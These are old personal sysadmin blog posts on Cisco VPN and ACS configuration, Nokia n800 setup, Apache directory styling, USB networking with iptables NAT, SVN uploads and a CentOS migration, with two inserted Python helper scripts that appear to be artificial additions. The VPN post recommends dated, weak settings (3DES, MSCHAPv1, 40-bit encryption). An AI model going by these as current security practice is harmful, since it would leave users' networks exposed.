Building a free Dynamic DNS client with Rackspace Cloud


As a cloud server customer you get access to Rackspace’s free DNS service.

When I first saw this product I had an instant light-bulb moment: I could stop paying for a dynamic DNS service and build my own private one. As a broadband (DHCP) user I have a very basic requirement of needing to regularly update an A record so that I can find my pc :)

To bring my idea to fruition I began researching; I needed a cli tool which I could run from cron on my linux box (to send the DNS update requests to Rackspace). In my research I found rscurl, a cli tool to control cloud servers; as Rackspace have a standard API for all their products I have been able to use rscurl to develop rsdns.

rsdns is a series of cli tools for adding/deleting/changing Rackspace DNS records. As part of the tool development I have created a script called rsdns-dc.sh to run on my machine; below is a short how to:

How to get free dynamic dns from rackspace.


Cisco VPN 3k Config for iPhone

Recently I was asked if I could help set up a VPN connection between an Apple iPhone and a Cisco VPN Concentrator 3000. My 1st round of googling didn’t look good, there’s a discussion here complaining about how crap vpn support on the iphone is; further searching led me to a Cisco document which specifically targets mac clients, this document is for ASA configuration, but if you look carefully* everything you need is in there.

*No, I didn’t get this working 1st time, it took me a good couple of hours of googling, but looking back I can see that all the info is there.

The key to getting this working is that the iphone side is not as configurable as it should be, so if you’re trying to get this to work you need to be talking to the IT administrator to get the concentrator side changed. The 1st word of warning is that the iphone client doesn’t support group authentication, so you’re going to be changing the base group; now by default most “production” groups will inherit settings from the base group, so you will need to make sure that if you change anything in the base group it doesn’t affect your other L2L or Remote Access tunnels. (You have been warned.)

To get started, for whatever reason the iphone only supports cisco’s NAT-T implementation of IPSEC, so if you have a firewall or access-list in front of your concentrator you’re going to need to open up UDP 4500, then enable NAT Transparency. Another word of warning about NAT-T: we found that existing VPNs to Cisco Routers started to fail after enabling this, which was a bit odd as NAT-T wasn’t enabled under any of the L2L profiles; anyway, to fix the issue we enabled NAT-T on the routers (again make sure UDP 4500 is allowed through any ACLs) and under “conf t” issue:

crypto ipsec nat-transparency udp-encapsulation

So, back to the cVPN3k config……


Configuration -> Tunnel & Security -> NAT Transparency
IPSEC over NAT-T - TICK

So a quick explanation of the above so you get the idea; from the tree on the left, click “Configuration” then “Tunnel & Security” then “NAT Transparency” and tick the box next to NAT-T.

Now you need to setup your PHASE 1 Proposal…

Config -> Tunnel & Sec -> IPSEC -> IKE Proposal

I called mine iphone, and you need to configure the following settings.

  • Authentication: Preshared Key (NOT the one with Xauth)
  • Hash: SHA-1
  • Encryption: 3DES
  • Diffie-Hellman: Group 2

After phase one, comes PHASE 2:

Config -> Policy Manage -> Traffic Mgnt -> SA

Again, add the following settings and I called mine: iphone

  • Authentication: ESP / SHA
  • Encryption: 3DES
  • Encapsulation: Transport
  • IKE Proposal = iphone (or whatever your phase 1 was called)

Then finally we start working with the groups, so as mentioned above you need to work with the base group:

Config -> User Management -> Base Group

And you need to enable the following, the other settings will be optional:

On the Base Group Tab,

  • Tunnel Protocol: Tick “L2TP over IPSec”

On the IPSEC Tab,

  • Authentication: Internal or NT depending on what you’ve already configured for other Remote Access Profiles.
  • IPSEC SA is set to: iphone
  • Default Preshared Key: Set this to something really really long (this will be your secret on the iphone)

On the PPTP/L2TP Tab,

  • L2TP Authentication Protocols: Tick MSCHAPv1 / MSCHAPv2
  • L2TP Encryption: Tick 40 & 128 bit

DONE! Now with a little bit of luck your iphone should connect.

A quick note about comments: all support requests will be deleted, I don’t have access to a concentrator to offer any meaningful advice, you use the above config at your own risk.

How to Import Vendor Specific Attributes into Cisco Secure ACS SE Appliance

I wanted to write a document on how to import RADIUS VSAs (vendor specific attributes) into Cisco’s ACS SE (Solution Engine) appliance, the reason being that I couldn’t find any good examples on the net and Cisco’s documentation just wasn’t clear enough.

My purpose was to use RADIUS authentication with a Nokia IPSO appliance so that users who access Voyager or ssh get authenticated centrally; for RADIUS authentication to work your authentication server (in this case ACS) needs to supply the AAA client (in this case the IPSO box) with a “return list attribute”. By default ACS doesn’t have the Nokia attributes; to import attributes you need to get your hands on a dictionary file, for Nokia IPSO it’s /etc/nokia.dictionary – I’ve a copy here.

In your dictionary file you need to pick out some key elements: firstly the IANA-assigned enterprise code for the vendor and secondly a list of attributes to add. Using my Nokia example the vendor code is the top line:

VENDOR Nokia 94

Thus the code is 94, and everything below that is an attribute.

So… Getting started with ACS: firstly, if you have AAA clients which you want to use the new attributes, you are going to need to delete them, and to be safe reboot ACS. Now the import is done via the RDBMS sync process; since you do not have OS level access to ACS you need to upload a file called “accountActions.csv” (case sensitive). Uploading this file tells the internal database to perform some commands or actions, examples would be to bulk import some users or bulk group changes; in our case we’re going to insert a new “Vendor” into the RADIUS database, and then insert some attributes.

I have created a file called createVendor_accountActions.csv; if you renamed it to accountActions.csv and uploaded it to your ACS box via the RDBMS Sync tool (under system configuration) it’d perform the following actions:

  • Command – 1
  • Priority – 8
  • Action – 350 (Create new Vendor)
  • Vendor Name – Nokia
  • ACS Vendor Number – Auto Assigned
  • Vendor ID – 94
  • Date of DB Transaction – 25/09/2007 13:00
  • Command – 2
  • Priority – 0
  • Action – 355 (Restart ACS Services)
  • Date of DB Transaction – 25/09/2007 13:00

The command numbers are just like primary key fields in a database or row numbers in a spreadsheet, they need to be unique and incremental for each csv file, and the priority specifies the order in which to apply the commands. I guess you could set the priorities all to 0 and rely on the command number to process the file in order, but I set a priority just in case. After you apply the file ACS will be temporarily unavailable as the services restart.

Now let’s take a look at one line of importAttributes_accountActions.csv (again it would need to be renamed to accountActions.csv before uploading):

  • Command – 1
  • Priority – 7
  • Action – 352 (Add VSA)
  • Attribute Name – Nokia-IMSI
  • The vendor to assign the attribute to – 94 (Nokia)
  • Attribute ID – 224
  • Attribute type – integer (can only be integer, string or ipaddr)
  • Date of DB Transaction – 25/09/2007 13:00

Hopefully this all starts to make sense when looking at your dictionary file; again the final line of the file restarts the services. An important thing to note here is that if you create a new vendor you need to restart the services before you can apply an attribute to it, and you need to restart the services again to use the attributes… at this point it’s probably worth mentioning that the version of ACS SE I’m using now (4.1) is a windows appliance, so if at any point your box hasn’t done what you think, a reboot won’t hurt ;)
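As an added example (not the post’s own file or tooling), here is a small Python script that pulls the vendor code and attributes out of a dictionary file and builds the 350 / 352 / 355 action rows described above, refusing attribute types ACS cannot hold; the dictionary sample is constructed and the column names of the output are an assumption, so check them against the RDBMS Sync import definitions for your ACS version before uploading.

```python
"""Generate the RDBMS Sync actions the post describes from a RADIUS
dictionary: 350 creates the vendor, 352 adds each VSA and 355 restarts
the ACS services after each batch."""
import csv
import io

# Constructed sample in the common FreeRADIUS-style dictionary layout. It is
# not the real /etc/nokia.dictionary; only the vendor line and Nokia-IMSI
# (224, integer) come from the post, the other attributes are made up.
SAMPLE_DICTIONARY = """\
VENDOR Nokia 94
# name                       id   type     vendor
ATTRIBUTE Nokia-IMSI         224  integer  Nokia
ATTRIBUTE Nokia-Sample-Str   240  string   Nokia
ATTRIBUTE Nokia-Sample-Addr  241  ipaddr   Nokia
ATTRIBUTE Nokia-Sample-Raw   242  octets   Nokia
"""

ACS_TYPES = {"integer", "string", "ipaddr"}   # the only types ACS accepts

# RDBMS Sync action codes quoted in the post.
CREATE_VENDOR, ADD_VSA, RESTART_SERVICES = 350, 352, 355

TRANSACTION_TIME = "25/09/2007 13:00"   # same stamp as the post's rows

# Assumed column names for the generated rows; the real accountActions.csv
# uses the fixed layout in the RDBMS Sync import definitions for your ACS.
COLUMNS = ["Command", "Priority", "Action", "VendorName", "VendorID",
           "AttributeName", "AttributeID", "AttributeType", "DateTime"]


def parse_dictionary(text):
    """Return (vendor_name, vendor_id, [(attr_name, attr_id, attr_type), ...])."""
    vendor_name, vendor_id, attrs = None, None, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # strip comments and blanks
        if not line:
            continue
        parts = line.split()
        if parts[0].upper() == "VENDOR" and len(parts) >= 3:
            vendor_name, vendor_id = parts[1], int(parts[2])
        elif parts[0].upper() == "ATTRIBUTE" and len(parts) >= 4:
            attrs.append((parts[1], int(parts[2]), parts[3].lower()))
    if vendor_id is None:
        raise ValueError("dictionary has no VENDOR line")
    return vendor_name, vendor_id, attrs


def vendor_actions(vendor_name, vendor_id):
    """Rows for createVendor_accountActions.csv: create the vendor, then
    restart, because the vendor must exist before attributes can reference it."""
    return [
        {"Command": 1, "Priority": 8, "Action": CREATE_VENDOR,
         "VendorName": vendor_name, "VendorID": vendor_id,
         "DateTime": TRANSACTION_TIME},
        {"Command": 2, "Priority": 0, "Action": RESTART_SERVICES,
         "DateTime": TRANSACTION_TIME},
    ]


def attribute_actions(vendor_id, attrs):
    """Rows for importAttributes_accountActions.csv: one 352 per attribute
    ACS can hold, then a final 355 restart. Unsupported types are reported
    rather than silently imported with the wrong type."""
    rows, skipped = [], []
    for name, attr_id, attr_type in attrs:
        if attr_type not in ACS_TYPES:
            skipped.append(name)
            continue
        rows.append({"Command": len(rows) + 1, "Priority": 7, "Action": ADD_VSA,
                     "AttributeName": name, "VendorID": vendor_id,
                     "AttributeID": attr_id, "AttributeType": attr_type,
                     "DateTime": TRANSACTION_TIME})
    rows.append({"Command": len(rows) + 1, "Priority": 0,
                 "Action": RESTART_SERVICES, "DateTime": TRANSACTION_TIME})
    return rows, skipped


def to_csv(rows):
    """Serialise rows in the assumed column order, blank cells where unused."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=COLUMNS, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    name, vid, attrs = parse_dictionary(SAMPLE_DICTIONARY)
    print(to_csv(vendor_actions(name, vid)))
    rows, skipped = attribute_actions(vid, attrs)
    print(to_csv(rows))
    print("skipped (type not supported by ACS):", skipped)
```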

Now you can add your AAA client and in my example you could set the vendor to RADIUS (Nokia). If you then go into interface configuration, RADIUS (Nokia) will appear; go in there and tick all the boxes for “group”. Finally if you go into your group setup, at the very bottom will be a list of attributes you’ve imported and can use! :cool:

Just in case you need them here are my references:

RDBMS Sync Import Definitions

Importing an accountActions.csv file into ACS SE

Universe CD version of RDBMS Sync import Defs

n800 Getting started (n00b) Guide… Part Two.

It’s taken me much longer to get this together than initially intended, so my apologies for that. How relevant this document is will depend on your reasons for buying your n800. What I wanted to do was concentrate on getting your n800 up and running, i.e. you’ve covered the basics, now let’s install some applications to make this brick useful.

Before re-flashing my device, I always take a list of what is installed, here’s what’s on there at the moment…

becomeroot
camera
canola
dates
devicescape
fmradio
hildon-theme-cacher
hildon-theme-plankton
maemo-serivice-handler
maemo-wordpy
maemokrypt
media center
microb-browser
openvpn
webmail notify
mplayer
navicore
openssh
oss-statusbar-cpu
pidgin
python2.5-runtime
simplelauncher
skype
videocenter

I won’t cover them all here, as we’d all fall asleep, so I’ll pick out some favourites…let’s get installing!

Multi-Media, Music ‘n’ Video to you and me.

In my opinion every n800 should have Canola installed, it’s a great multimedia app. Canola has had some dependency issues in the past, so I’d recommend you install it before anything else. To get this working disable all your repo’s except the “Nokia Catalogue” and “Nokia Catalogue 3rd Party”, then hit this canola one click install.

UK Media Player (UKMP) is another great application to install for multi media, it has a couple of dependencies. You’ll need to switch on the extras repo, install mplayer (even if you don’t want ukmp, I’d recommend installing mplayer as it’s brilliant at playing back virtually any video file) and python either by using the application manager or the one click install files.

Utilities, those little extras you might need.

Here are some extras that’ll enhance your n800 experience; you should already have xterm installed, right? But some other things that might take your fancy would be oss-statusbar-cpu, it adds a nice little applet to the systray that shows how “busy” your n800 is, and you can add some commands to it too!

Camera & FM radio, are two Nokia apps that enhance what you can do with the n800 hardware that aren’t loaded by default, I’m not sure why… but to make it easier for you I’ve published a copy of my sources list, if your application manager has all these catalogues installed you should see the Camera and radio as options you can install.

Since writing my first document, OpenSSH has made its way into a repo, whether you use that or dropbear is up to you, I prefer openssh as it supports the keys that I use on the rest of my linux kit.

Plankton theme is probably one of the most popular themes added to an n800, to get it working you’ll need both files plankton + hildon theme cacher… also as quick tip, always change your theme to a default Nokia one before running a backup and re-flashing your device… basically it’ll stop the restore trying to use plankton before you’ve installed it.

Web, well it is a Nokia touch, I mean internet tablet after all.

I’d recommend you install the firefox derived web browser for maemo, it’ll allow you to run “non opera supported” sites like google docs. You can switch between the opera and firefox rendering engine; to do that you need to enable the hidden menu by editing /home/user/.browser and set hidden=true (Reference).

If you have a gmail or google apps account you’ll also want the Nokia mnotify, it’ll add a little applet to your systray … personally I’d prefer it to completely disappear if you haven’t got any new mail.

If you’re into instant messaging, then you’ll need a copy of Pidgin. It’s installed in components so if you’re an msn or googletalk user make sure you install the correct protocol support, if all else fails install them all :)

For mobile blogging you may want maemo-wordpy, it’s not yet something I’ve taken massive advantage of as I don’t have a keyboard and you need a reasonable amount of patience or practice to write a post with the stylus, but this is something I intend to tackle!

Pim, you know contacts and calendar stuff.

There’s no right answer to this, in fact I’ve still yet to find something that suits me. As a user, I prefer Dates, Contacts and tasks by pimlico, they’re built on the existing nokia “contacts” back end (evolution data server), but I’ve yet to find a way of sync’ing them with anything, which makes bulk importing and general day to day usage an issue.

The alternative is the GPE suite (calendar, contacts and todo). Lots of people recommend GPE; originally I had dependency conflicts on mine when I was running the 2nd version of ITOS. I’m yet to install it, but I plan to as there’s been lots of complementary projects like erming for google calendar syncing and GPE summary – a desktop applet summary of your tasks and calendar.

Ok, I think we’ll finish there….
I think this post is long enough; I’d like to also do a part 3 and look at the security apps you can install on your n800. This won’t be so much of a n00b guide because it won’t appeal to most people, but it’s one of the reasons the n800 caught my eye originally.

CSS Styling Apache Directory Listings.

[Screenshot: before I changed Apache]

As part of my website overhaul, I’ve finally gotten round to styling my /files/ directory. I was surprised at how easy it was actually, and the benefits far outweigh the time taken to set it up: not only does this part of the site now “fit in”, but I can apply analytics tracking and adsense ;) I’m sure there probably is a wordpress plugin that can achieve the same thing… probably better, but I find my list of plugins ever growing and since I don’t need one for this I figure if Apache can do it, let Apache do it!

The work can be done in one of two ways: either by pasting Apache directives into a .htaccess file (in the directory you want to apply the conf to), or in your httpd.conf you can wrap it all up in a <Directory> block… something like

<Directory "/var/www/html/files/">
    foobar
</Directory>

(where foobar stands for the directives),

below is an example of a .htaccess file as that will apply to most people:

        RewriteEngine Off
        AddType text/html .shtml
        AddOutputFilter INCLUDES .shtml
        Options Indexes Includes
        IndexOptions FancyIndexing SuppressHTMLPreamble XHTML IconsAreLinks FoldersFirst SuppressDescription
        HeaderName /files/HEADER.shtml
        ReadmeName /files/README.shtml

Since my site uses wordpress with “pretty permalinks” enabled, the 1st thing I needed to do is disable mod_rewrite for the directory where I wanted listing enabled. Now if you check my /files/ page you’ll notice that the page title and tag line under “[LINICKX].com” change depending on what directory you are viewing; this is done with “Server Side Includes” (SSI), so the next two options in the above config set that up.

Now to take a look at the actual directory listing setup, it might be worth you taking a look at the Apache documentation for a full description, but the important ones to note are

Options Indexes Includes

to enable directory listing and switch on SSI, then you need

IndexOptions SuppressHTMLPreamble XHTML

to disable the default headers so that we can setup our style sheet and favour xHTML over HTML. Apache 2.2 users also have IndexStyleSheet available, but since I’m using CentOS4 we’ll do it this way. Finally you need the HeaderName, ReadmeName directives to tell Apache which file to look for (by default Apache looks for README.html, but that won’t support SSI)… note how my .shtml files are relative to my web root, these are not absolute paths on the file system, i.e. /files actually maps to /var/www/html/files.

You’re now good to go: HEADER.shtml should contain all the xHTML you want to appear before the directory listing, and README.shtml is everything after… make sure you include all the correct <html>, <body> and DOCTYPE tags.

Now you’ll want to get some dynamic content working; for a simple “print current directory” you can use

<!--#echo var="REQUEST_URI"-->

in your html, further documentation on getting more magic is available here & here, I was able to knock up a simple line of code to print the current year at the bottom of the page….

<!--#config timefmt="%Y"-->
<small>Nick Bettison 2005 - <!--#echo var="DATE_LOCAL"--> &copy;</small>

Cool eh! The trick to watch out for is spaces in the above code: there should be no white space inside the opening

<!--#echo

or the trailing

-->
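As an added example, not from the post, here is a Python check for two things worth knowing about the setup above: an SSI directive with whitespace after `<!--` is not recognised by mod_include and is sent to the browser as an ordinary comment, and `Options Includes` also allows `<!--#exec -->`, which a listing that only uses `#echo` and `#config` does not need (`IncludesNOEXEC` still permits those). The .htaccess is the one above; the .shtml samples are constructed.

```python
"""Lint a directory-listing setup of the kind in the post: find SSI
directives mod_include will silently pass through, and report when
Options Includes grants #exec that no page actually uses."""
import re

# The .htaccess from the post, used as the sample input.
HTACCESS = """\
RewriteEngine Off
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
Options Indexes Includes
IndexOptions FancyIndexing SuppressHTMLPreamble XHTML IconsAreLinks FoldersFirst SuppressDescription
HeaderName /files/HEADER.shtml
ReadmeName /files/README.shtml
"""

# Constructed .shtml files; line 3 of HEADER.shtml carries the spacing mistake.
SHTML_FILES = {
    "HEADER.shtml": """\
<html><body>
<h1>Index of <!--#echo var="REQUEST_URI"--></h1>
<p>Generated <!-- #echo var="DATE_LOCAL" --></p>
""",
    "README.shtml": """\
<!--#config timefmt="%Y"-->
<small>Nick Bettison 2005 - <!--#echo var="DATE_LOCAL"--> &copy;</small>
</body></html>
""",
}

# A real directive starts with '<!--#'; whitespace between '<!--' and '#'
# turns it into a plain HTML comment that mod_include never evaluates.
GOOD_DIRECTIVE = re.compile(r"<!--#(\w+)")
BAD_DIRECTIVE = re.compile(r"<!--\s+#(\w+)")


def includes_mode(htaccess_text):
    """Return 'exec', 'noexec' or None from the Options line (handles +/- prefixes)."""
    for line in htaccess_text.splitlines():
        parts = line.split()
        if not parts or parts[0].lower() != "options":
            continue
        flags = {p.lstrip("+-").lower() for p in parts[1:]}
        if "includesnoexec" in flags:
            return "noexec"
        if "includes" in flags:
            return "exec"
    return None


def lint_shtml(name, text):
    """Findings for one .shtml file as (file, line, kind, directive) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in BAD_DIRECTIVE.finditer(line):
            findings.append((name, lineno, "malformed-directive", m.group(1)))
        for m in GOOD_DIRECTIVE.finditer(line):
            if m.group(1).lower() == "exec":
                findings.append((name, lineno, "exec-directive", m.group(1)))
    return findings


def lint_site(htaccess_text, shtml_files):
    """Lint every page, then compare what Options grants with what is used."""
    findings = []
    for name, text in shtml_files.items():
        findings.extend(lint_shtml(name, text))
    uses_exec = any(f[2] == "exec-directive" for f in findings)
    if includes_mode(htaccess_text) == "exec" and not uses_exec:
        findings.append((".htaccess", 0, "prefer-includesnoexec",
                         "Options Includes allows #exec but no page uses it"))
    return findings


if __name__ == "__main__":
    for finding in lint_site(HTACCESS, SHTML_FILES):
        print("%s:%d %s (%s)" % finding)
```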
[Screenshot: looking much better, after]

The final thing you’ll want to look at is those horrible default icons! You have a couple of options: you can either simply replace/over-write the default ones (on my flavour of linux they are in /var/www/icons), or you can add

AddIcon /icons/tar.png .tar

to your htaccess file telling apache to look at tar.png rather than the default tar.gif. I found some deb archives which I extracted with file-roller (rather than trying to install anything) and simply changed the ones I was going to use…. I’m very pleased with the final result, I think it makes a big difference.

Happy Styling One & All!

USB Networking with Fedora 7 & n800

There are times where you cannot use WiFi, for example my workplace’s WLAN uses LEAP, which maemo doesn’t support. I found that setting up USB networking on my n800 was a bit of a pain since there isn’t a single document… if you check my del.icio.us feed you’ll see I bookmarked all I could find with a usbnet tag.

These are the steps I ran through to enable usb networking between my nokia n800 and my fedora 7 laptop.

First we’ll start with the basic setup… I’ll assume you’ve read a getting started article similar to mine and already have root & xterm. By default n800 has a usb interface configured, you just need to enable it, so on your n800 type:

sudo gainroot
insmod /mnt/initfs/lib/modules/2.6.18-omap1/g_ether.ko
ifup usb0

The default settings add an interface with a static ip of 192.168.2.15/24 with a default gateway of 192.168.2.14.

Now lets set up something similar on Fedora, you need to create a file in /etc/sysconfig/network-scripts called ifcfg-usb0 with the following…

DEVICE=usb0
BOOTPROTO=static
IPADDR=192.168.2.14
BROADCAST=192.168.2.255
NETMASK=255.255.255.0
NETWORK=192.168.2.0
ONBOOT=no
MII_NOT_SUPPORTED=no

Now plug the usb cable into both devices, and on your fedora box (as root) type

ifup usb0

You now have connectivity; of course if you have a default fedora install pinging 192.168.2.15 will fail because of the firewall, it is probably best to temporarily disable the firewall (/etc/init.d/iptables stop) to see if it works, if so move on to configuring your firewall correctly (/etc/init.d/iptables start starts it again) :) You may also get usb conflicts, you can try

rmmod uhci_hcd

but it will disable any USB devices, you have been warned.

With this basic connectivity setup you’ll have two issues; you only have connectivity between fedora & n800 nothing else works, and opening any application on n800 causes it to try and connect to your wifi, so lets look at those….

I’m going to assume you used system-config-securitylevel to configure your firewall; it’s worth noting that any changes you make now will be overwritten by any future use of system-config-securitylevel, so it’s probably best to take a backup of /etc/sysconfig/iptables now and later when you’re finished.

So as root type:

iptables -I RH-Firewall-1-INPUT 2 -i usb0 -j ACCEPT
iptables -I FORWARD 1 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -I FORWARD 1 -s 192.168.2.0/24 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -s 192.168.2.0/24 -j MASQUERADE
/etc/init.d/iptables save

This will allow all connectivity in from the usb interface, allowing the n800 to send packets into the fedora box whilst the firewall is running; it will also NAT any traffic from the usb network, hiding the n800 behind fedora so that you get onward connectivity. To get the NAT to work you need to enable ip forwarding, this allows fedora to pass packets between interfaces; to do that type

echo 1 > /proc/sys/net/ipv4/ip_forward

and to get it to survive a reboot update /etc/sysctl.conf with

net.ipv4.ip_forward = 1

The final part is to enable name resolution (DNS), on n800, I updated /etc/resolv.conf with the opendns servers…

nameserver 208.67.222.222
nameserver 208.67.220.220

All things being equal you should now be able to ping www.google.com from your n800 :cool:

To get applications to connect, I found on the latest version of ITOS that the DUMMY IAP didn’t work, so I stumbled across this solution.

Create an “ad hoc” wifi connection with static IPs… anything it doesn’t matter, and when that’s connected in xterm (as root) type ifconfig wlan0 down , you should now be able to connect to the web with your browser / skype etc over your usb network… sweet!

n800 Getting started (n00b) Guide… Part One.

I’ve had my n800 a little over two weeks, and the length of this post will probably explain why I haven’t posted about it before. I love the box, it looks sooo good, and the linux inside means that the scope of potential is just unimaginable… but… the experience isn’t perfect. I guess the experience is very much like the windows / linux thing as a whole, what works is great, but sometimes getting linux “just so” can be more of an effort than in windows.

I’ve decided to write up all my notes and bookmarks to make things easier for any other n800 n00bies :) Before we get started, the compulsory screen shot!

Screenshot of my n800 Desktop

Adding Software.
You’ll notice that there’s not a great deal installed, and what’s there very much resembles a phone ( *shock* ) and very quickly you’re going to want something extra. Now you’re in a bit of a chicken and egg scenario: some software requires root access (more on that later) and some have a neat “single click install”.

First place to look for “single click installs” is maemo.org/downloads but you’ll notice that some of the icons are greyed out, so I’d recommend going through the pain (lots of typing / hand writing with a stylus) of setting up all the application repositories. To do so, open up the application manager, click (menu) Tools -> Application Catalogue -> New and simply fill in the fields for each repo one at a time. After completing this you’ll be asked to refresh the catalogue; if you get errors you’ll have to go through each one singly, disabling it and doing a refresh until it works, and then check that you’ve made no mistakes; on the other hand if it works you’ll notice loads of new cool things you can install.

Got root?
If you’re new to linux, and don’t know about root, it’s basically the same as the “Administrator” account on windows… but with one exception: root has NO RESTRICTIONS.. windows can (and does sometimes) stop the administrator from doing things (like deleting locked files); Unix / Linux will let the root account do anything, including wipe the file system, so use the root account with care.

You’re going to need root to do certain things; to use root you need to install “xterm” and “becomeroot” from your list of newly setup applications. Running xterm will give you a shell (like a windows dos prompt) whereby you can directly type commands into the underlying linux; by typing sudo gainroot you’ll notice the prompt will change from $ to #, you now have god like access to your box… at this point I recommend you change the root password from “rootme” to something more secure, type passwd and follow the instructions. :)

(If that doesn’t work, read below, install ssh and see this)

Remote Access.
You can get remote access onto your n800 via a couple of ways. If you like a GUI try x11vnc from here you can get a vncviewer (for windows or linux) download the .deb file and open it with the application manager. I had no problems getting this working, but I did find using the mouse and keyboard on my pc a little slow and un-responsive so ymmv :)

The other way, and what I use, is an SSH session: much quicker, very usable, and like running the xterm from your pc. From the list of installable applications choose “dropbear server” and connect using a client (try putty for windows).

To connect to your Internet Tablet you will need to know its IP address. To find this open the Connection manager and select Internet connection > IP address from the menu. Tip – you may find it easier to use a fixed IP address.

you can ssh root@ipaddress (using the password you set before, see why I said to change it) of course to be safe you can ssh user@ipaddress, but you’ll have to change the password for user like you did before but in a $ shell.

You’ll also want to disable ssh from starting automatically, you don’t want some script-kiddy trying to hack your box whilst you’re connected to a wifi network, as root type update-rc.d -f dropbear remove , then when you need it you can do /etc/init.d/dropbear start :cool:

Battery Life.
The 1st thing I noticed when I got my new toy was that I hammered the battery and only got about 1 -> 2 hours wireless usage. I can confirm that using adhoc wireless connections eats the battery; out in the world with proper AP’s battery life seems fine (3hrs+ online perhaps), but at home it really doesn’t last that long.

There are lots of things you can do to improve battery life. 1st up enable “soft power off”, this will allow you to hold down the power button to put the n800 into standby mode, really useful for hitting before you put it back in your pocket. See this post here for a full set of instructions. Next up, tweak your wireless settings.. what you set here will depend on what you bought the n800 for; I would have thought most people would disable the “search for wifi” functionality as you probably don’t need it to automagically connect to a network whilst you’re driving or walking, so under the control panel -> connectivity set the search interval to “Never”. I’ve also screwed my Idle times right down so that it disconnects if I’m not doing anything …I haven’t yet been disconnected when I was doing something, but I do usually have to hit “connect to network” before opening a browser etc.

I’d also suggest using offline mode when you’re watching a video or something, that way “stuff” isn’t happening in the background when you’re not using it.

End of Part One
I think that’s long enough, those few tips should be enough to make most users 1st experience better, in part two I’m going to talk about Apps, what I’ve installed and what didn’t get uninstalled :)

A Linux / Command line: how to upload to wordpress wp-plugins.org via subversion ( SVN )

Could that title get any longer !

Hopefully you get the point, sometimes you need different tools for different jobs, if you want a full development platform with SVN support I suggest you take a look at eclipse (with subclipse ) but what if you already have done the development and you just want to do a quick upload.

My phpbb_recent_topics plugin is hosted here, and when the nice guys at wordpress gave me an svn account, I just wanted a quick way to upload what I’ve done. Now I must stress this may not be the “proper” way to use svn (there’s a book for that) but it is enough to achieve what we want, a straight forward upload.

I’m using redhat, so the 1st step was to install dag’s subversion rpm , I also needed to setup an “editor” variable for commenting.

SVN_EDITOR=vi
export SVN_EDITOR

Then, I went into a directory onto my server, and downloaded a copy of the existing subversion directory structure.

[nick@SERVER wp_plugins]$ svn checkout https://svn.wp-plugins.org/phpbb-recent-topics/
A    phpbb-recent-topics/trunk
A    phpbb-recent-topics/branches
A    phpbb-recent-topics/tags
Checked out revision 9232.
[nick@SERVER wp_plugins]$

My plugin (at the time) was on version 1, so my 1st steps were to create a version 1 tag, add it to svn, get the stable copy of my plugin, add that to svn.

[nick@SERVER wp_plugins]$ cd phpbb-recent-topics/
[nick@SERVER phpbb-recent-topics]$ ls
branches  tags  trunk
[nick@SERVER phpbb-recent-topics]$ cd tags/
[nick@SERVER tags]$ mkdir 0.1
[nick@SERVER tags]$ cd ..
[nick@SERVER wp_plugins]$ svn add phpbb-recent-topics/tags/*
A         phpbb-recent-topics/tags/0.1
[nick@SERVER wp_plugins]$ cd phpbb-recent-topics/tags/0.1/
[nick@SERVER 0.1]$ wget http://www.linickx.com/files/php/phpbb_recent_topics.txt
[nick@SERVER 0.1]$ mv phpbb_recent_topics.txt phpbb_recent_topics.php
[nick@SERVER 0.1]$ svn add phpbb_recent_topics.php
A         phpbb_recent_topics.php
[nick@SERVER 0.1]$

Finally I updated everything, and uploaded (committed) my files.

[nick@SERVER 0.1]$ cd ../../../
[nick@SERVER wp_plugins]$ svn update phpbb-recent-topics/
At revision 9232.
[nick@SERVER wp_plugins]$ svn --username linickx commit phpbb-recent-topics/
Adding         phpbb-recent-topics/tags/0.1
Adding         phpbb-recent-topics/tags/0.1/phpbb_recent_topics.php
Transmitting file data .......
Committed revision 9233.
[nick@SERVER wp_plugins]$

Remember this doesn’t publish your plugin on wordpress.org, to do that you need a valid readme.txt in the trunk directory, but as you can see once you’ve created all the files on your local box, it’s just a few commands to get your work uploaded.

Did you notice that the wordpress svn supports SSL ?

How to Migrate from White Box Linux 4 to CentOS 4.4

There are some things that you just never get round to; my nagios box was still running whitebox linux, and I’ve finally gotten round to “upgrading” it to CentOS… yeah ok, upgrade is arguable, but you get my point.

First off a warning: Don’t do this! All the documentation, for CentOS, RHEL, Fedora, any redhat linux, says clean installs are the best way and upgrades are not advised…. therefore I offer no support or warranty that this will work; in fact, I advise you to read this post, but step away from your consoles!

But, if you think it might be a laugh, the centos documentation is a bit old and not 100% correct, so here is what I did. First up (as root – obviously), clear out your yum cache, and install the CentOS gpg key.

yum clean all
rpm --import http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-4

Next, install some base centos packages, take note that some need to be forced on

rpm -Uvh --nodeps http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/centos-release-4-4.2.i386.rpm
rpm -ivh http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/python-elementtree-1.2.6-4.2.1.i386.rpm
rpm -ivh http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/python-sqlite-1.1.7-1.2.i386.rpm
rpm -ivh http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/sqlite-3.3.3-1.2.i386.rpm
rpm -Uvh --force http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/python-urlgrabber-2.9.8-2.noarch.rpm
rpm -Uvh --nodeps http://mirror.centos.org/centos/4.4/os/i386/CentOS/RPMS/yum-2.4.3-1.c4.noarch.rpm

finally remove the whitebox rpm db.

rpm -ev rpmdb-whitebox

Move any “whitebox” mirrors still in /etc/yum.repos.d and

yum install rpmdb-CentOS

Once you have that sorted, you can complete the upgrade with

yum update
reboot

& cross your fingers ;)

If you come across the following warning while using yum: “Warning, could not load sqlite, falling back to pickle”, I found…

yum install python-sqlite

Fixed the problem. And there we have it, all my boxes are now running CentOS – yay – just in time to look at the CentOS 5 upgrade ;)

Dependency Problems?
